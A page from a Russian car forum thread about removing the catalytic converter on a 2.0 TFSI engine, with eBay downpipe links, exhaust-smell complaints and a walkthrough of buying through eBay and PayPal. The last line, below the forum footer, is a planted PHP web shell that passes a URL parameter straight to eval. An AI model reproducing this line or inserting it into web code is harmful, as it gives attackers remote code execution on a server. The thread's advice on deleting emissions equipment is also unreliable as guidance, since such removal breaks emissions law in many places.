+ Ответить в теме
Страница 3 из 3 ПерваяПервая 1 2 3
Показано с 21 по 28 из 28

Тема: Удаление Катализатора На 2.0 Tfsi


  1. #21
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    http://cgi.ebay.com/ebaymotors/06-GOLF-GTI...sQ5fAccessories
    нормальный пайп, даже есть проставка под вторую лямбду!
    А в целом они все почти примерно одного качества, я брал себе на Г4 фирмы OBX, здесь таких ненашел ео один в один также выглядят.
    выберай тот который не самый дешевый и не самый дорогой и смотри чтобы доставка до России была, а то они не все отправляют сюда.
    http://shop.ebay.com/items/_W0QQ_dmptZMoto...I&_osacat=0
    AtmoBrothers

  2. #22
    у меня весь выхлоп APR а прога WETTERAUER. и все работает отлично! но выхлоп воняет так как будто не все сгорает т.е. богатая смесь! при все это машина стала поживее набирать скорость и на газ реагирует сразу прям.

  3. #23
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    <div class='quotetop'>Цитата(ed1evil &#064; Nov 13 2008, 16&#58;19) <{POST_SNAPBACK}></div><div class='quotemain'>но выхлоп воняет[/b][/quote]
    тоже самое, вонь, но из-за того что ката у тебя нету
    AtmoBrothers

  4. #24
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    <div class='quotetop'>Цитата(ed1evil &#064; Nov 13 2008, 15&#58;19) <{POST_SNAPBACK}></div><div class='quotemain'>у меня весь выхлоп APR а прога WETTERAUER. и все работает отлично&#33; но выхлоп воняет так как будто не все сгорает т.е. богатая смесь&#33; при все это машина стала поживее набирать скорость и на газ реагирует сразу прям.[/b][/quote]

    У меня воняло, пока я не загерметизировал стыки.
    А катализатор у нас есть, ведь АПР должен соблюдать экологию в США или я ошибаюсь??
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  5. #25
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    <div class='quotetop'>Цитата(Grisha &#064; Nov 13 2008, 10&#58;23) <{POST_SNAPBACK}></div><div class='quotemain'>http://cgi.ebay.com/ebaymotors/06-GOLF-GTI...sQ5fAccessories
    нормальный пайп, даже есть проставка под вторую лямбду&#33;
    А в целом они все почти примерно одного качества, я брал себе на Г4 фирмы OBX, здесь таких ненашел ео один в один также выглядят.
    выберай тот который не самый дешевый и не самый дорогой и смотри чтобы доставка до России была, а то они не все отправляют сюда.
    http://shop.ebay.com/items/_W0QQ_dmptZMoto...I&_osacat=0[/b][/quote]

    Спасибо Гриша принимается, токмо я ни разу не заказывал
    ничего на бае, какова процедура, какие подводные камни???
    Очень хоцца...

  6. #26
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    <div class='quotetop'>Цитата(КИБАЛЬЧИШЬ &#064; Nov 13 2008, 22&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Спасибо Гриша принимается, токмо я ни разу не заказывал
    ничего на бае, какова процедура, какие подводные камни???
    Очень хоцца...[/b][/quote]
    Регистрируешь аккаун на Э-бэе. Потом регишь Пай-Палл, для этого предварительно делаешь карточку (VISA Classic или любую другую из тех что указаны на сайте Pay-Pall). После того как карту в банке сделаешь (В уралСибе за 600р делают вроде), зарегишь на нее Pay-Pall, кидаешь денег на нее ровно столько сколько стоит твой лот + доставка (это тебе скажет продавец, т.к. ты с ним свяжешься када захочешь купить лот). Продавец те вышлет Инвойс и ты его оплачиваешь нажиманием кнопки оплатить.. примерно схема такая..
    Подводные камни, в том что посылка прилетает из США за 4-5 дней, а еще месяц лежит и ждет таможенного оформления, а ты пускаешь слюни и слушаешь хамские ответы от работнив почты России, когда пытаешься узнать долголи тебе еще ждать.
    AtmoBrothers

  7. #27
    <div class='quotetop'>Цитата(Serzh &#064; Nov 13 2008, 18&#58;39) <{POST_SNAPBACK}></div><div class='quotemain'>У меня воняло, пока я не загерметизировал стыки.
    А катализатор у нас есть, ведь АПР должен соблюдать экологию в США или я ошибаюсь??[/b][/quote]
    кат есть 500%, что значит загерметизировал, промазал герметиком? и что это дало тебе?
    у меня запах как при богатой смеси

  8. #28
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Ну все кризис подкосил меня, поэтому заказываю...
    Не ищите логики в предыдущем предложении.

    Коллеги подскажите а кто мне может помочь
    в заказе одной из вот этих красавиц
    http://shop.ebay.com/items/_W0QQ_dmptZMoto...I&_osacat=0

    Ну или конкретно как сказано выше
    http://cgi.ebay.com/ebaymotors/06-GO...Q5fAccessories

+ Ответить в теме
Страница 3 из 3 ПерваяПервая 1 2 3

Похожие темы

  1. удалил оба катализатора
    от NEVO в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 24
    Последнее сообщение: 02.10.2023, 07:27
  2. Замена катализатора на пламягаситель на 2.0 TFSI
    от VAG-DOCTOR в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 17
    Последнее сообщение: 01.10.2023, 22:43
  3. Удаление Катализатора На Г3
    от motor_62 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 3
    Последнее сообщение: 25.05.2008, 17:48
  4. удаление резонаторов
    от iv_mark в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 12
    Последнее сообщение: 04.04.2008, 03:07
  5. Удаление катализатора на 2.0Т FSI
    от umidka в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 11
    Последнее сообщение: 04.03.2008, 16:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}